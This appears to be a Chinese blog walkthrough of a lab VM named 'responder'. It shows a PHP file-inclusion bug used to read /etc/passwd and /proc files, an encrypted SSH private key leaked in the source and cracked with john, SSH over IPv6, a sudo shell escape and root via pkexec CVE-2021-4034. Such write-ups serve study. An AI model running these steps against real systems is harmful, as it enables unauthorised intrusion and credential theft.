靶机渗透日记 responder

已于 2022-03-02 15:07:42 修改
阅读量3.2k 收藏
点赞数
文章标签: php 安全 web安全
于 2022-02-28 13:34:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123180390
版权

  1. IP

  2. 端口

    在这里插入图片描述

  3. 访问 80 端口只有一句话,目录扫描

    在这里插入图片描述
    在这里插入图片描述

    访问 /filemanager.php 会跳转到 index.php ,可能是因为没有参数的原因,接下来爆破参数

    ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0

    在这里插入图片描述

    得到参数 random ,burpsuite 抓包测试

    在这里插入图片描述

  4. 使用 php 伪协议读取 filemanager.php 源码

    <?php
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');


/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
-----END RSA PRIVATE KEY-----


*/

?>

    得到了 ssh 私钥,但是端口扫描得知 22 端口处于 filter 状态

  5. 爆破 ssh 私钥

    john --wordlists=/usr/share/wordlists/rockyou.txt hash.txt

    在这里插入图片描述

  6. 使用 ipv6 地址链接 ssh

    curl 'http://192.168.0.132/filemanager.php?random=/proc/net/if_inet6'

fe80000000000000020c29fffefeab39 02 40 20 80    ens33
00000000000000000000000000000001 01 80 10 80       lo
fd154ba55a2b1008020c29fffefeab39 02 40 00 00    ens33

    使用 nmap 扫描

    nmap -6 -p22 fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39

    在这里插入图片描述

    连接

    ssh elliot@fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39 -i id_rsa  -6

  7. 执行 sudo -l

    在这里插入图片描述

    发现可以以 rohit 用户运行 calc ,执行 !/bin/bash 获得 shell

    查看 SUID 文件,发现可以运行 pkexec ,使用 CVE-2021-4034 进行提权

    在这里插入图片描述

在这里插入图片描述

# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hack the box -- Responder靶机
m0_64815693的博客
12-15 2320
Hack the back 靶场 Responder
php文件管理工具——RESPONSIVE filemanager
热门推荐
Hooting的码农笔记本
04-09 1万+
RESPONSIVE filemanager 功能: 文件上传 文件下载 重命名文件 删除文件 新建文件夹 为每个用户创建子目录 效果图 参数设置 $base_url 设置文件位置的基本路径
TinyMCE插件:RESPONSIVE filemanager 9 安装与配置
Dy大叔的日常
12-04 735
RESPONSIVE filemanager 功能: 文件上传 文件下载 重命名文件 删除文件 新建文件夹 为每个用户创建子目录 上传文件效果图: 浏览文件效果图: 文件说明: filemanager(核心程序文件),放入TinyMCE的Plugins(插件)文件中 source(文件上传文件夹),放在任意位置,配合$upload_dir路径一起使用 thumbs...
hack the box靶场responder靶机
zr1213159840的博客
04-12 3652
打开靶机,看第一个问题: 问:机器上跑了几个tcp端口? 回答:3个,才开始使用默认扫描方式只扫出来一个80,后来指定了端口返回,扫出来三个端口,分别是80、5985、7680,使用如下命令扫描 nmap -v -A -p1-65535 10.129.212.141 第二个问题: 问:当使用IP进行访问时,被重定向去了哪里? 回答:unika.htb 第三个问题: 问:网页是使用哪种脚本语言写的? 回答:php。 首先在burpsuite中进行抓包,然后对回包进行截取 然后能看到网页是用php
HTB_Responder 综合靶机 菜菜被虐现场实录
网络安全学习
04-26 4398
今天的练习有一点苦恼,啥都不会 😭😭😭😭 文章目录信息收集修改 host 进入网站查看网站功能探测漏洞-文件包含利用 SMB 窃取 NTLM hashNTLM 碰撞获取可用账号密码获取 shell后放答案 信息收集 拿到靶机日常扫描不用说了,-A 竟然什么都没扫描到 ┌──(root💀kali)-[~] └─# nmap -A -T4 10.129.95.234 All 1000 scanned ports on bogon (10.129.95.234) are in ignored states. .
靶机渗透日记
Anonymous
03-01 3519
IP 端口 访问 80 端口 目录扫描 robots.txt & note.txt 访问 crossroads.png ,是一张图片 访问 SMB smbclient -L 192.168.0.133 访问 smbshare 提示需要密码 对目标上的SMB信息进行枚举 enum4linux 192.168.0.133 -A 爆破 SMB 密码 登录 SMB 服务 smbclient //192.168.0.133/smbshare -U ..
靶机渗透日记 funbox
Anonymous
02-22 919
ip 端口 访问 80 端口 目录扫描 访问 robots.txt , /secret ,/admin/?/login 发现都没有得到有用的东西,继续对 /store 目录扫描 同样存在后台地址 访问该后台地址 这里通过尝试弱口令或者在 books 标签页中发现参数 bookisbn 存在sql注入,通过 sqlmap 也可以得到后台管理员的账号密码 发现存在文件上传,尝试上传webshell 在Image可以直接上传.php可以成功getshell 在 /home/to.
靶机渗透日记-内网
Anonymous
03-22 3595
WEB win7/admin 域成员 win2016/Admin#123 域控 administrator/Admin@666 流程 IP探测 端口扫描 Win7系统,并且开放了139,445端口,尝试MS17-010 返回 system 权限 还有一种思路就是利用80端口的通达OA系统 使用工具上传一句话木马,使用蚁剑连接GETSHELL 信息收集,发现WEB服务器存在双网卡 添加路由信息 run post/multi/manage/autoro..
JIS-CTF 靶机渗透
qq_43235703的博客
02-02 2250
渗透之JIS-CTF靶机 攻击环境 攻击机:kali(10.0.10.223) 靶机:在vmbox上(10.0.10.221) 连接设置:两台均为桥接网卡 探嗅目标 netdiscover -i eth0 _____________________________________________________________________________ IPAt MAC Address...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1284
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
Ubuntu 查询未更新的包 进行手动更新
最新发布
小婷
07-19 53
lsb_release -a 查询ubuntu的版本号,我这边是20.04。apt list --upgradable 查询未更新的包。中间遇到输入选择,输入y即可。
PHP小课堂】学习PHP中的字符串操作函数(三)
硬核项目经理
07-15 781
学习PHP中的字符串操作函数(三)继续我们的 PHP 中字符串函数的学习之旅。今天我们要学习的内容是除了 str_ 和 str 开头之外的其它函数,这些函数也有很多非常好玩的内容,让我们赶快进入主题吧。分隔、打断字符串关于这个分割字符串并成为数组,或者是反过来的将数组组合成字符串的功能来说,implode() 和 explode() 这两个函数真的是出镜率非常的高。所以它们的使用也不用我多做介绍了...
php 实现栈
huanghm88的专栏
07-16 341
可以根据需要使用这些方法来操作栈。类,其中包含了入栈()和判断栈是否为空(
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值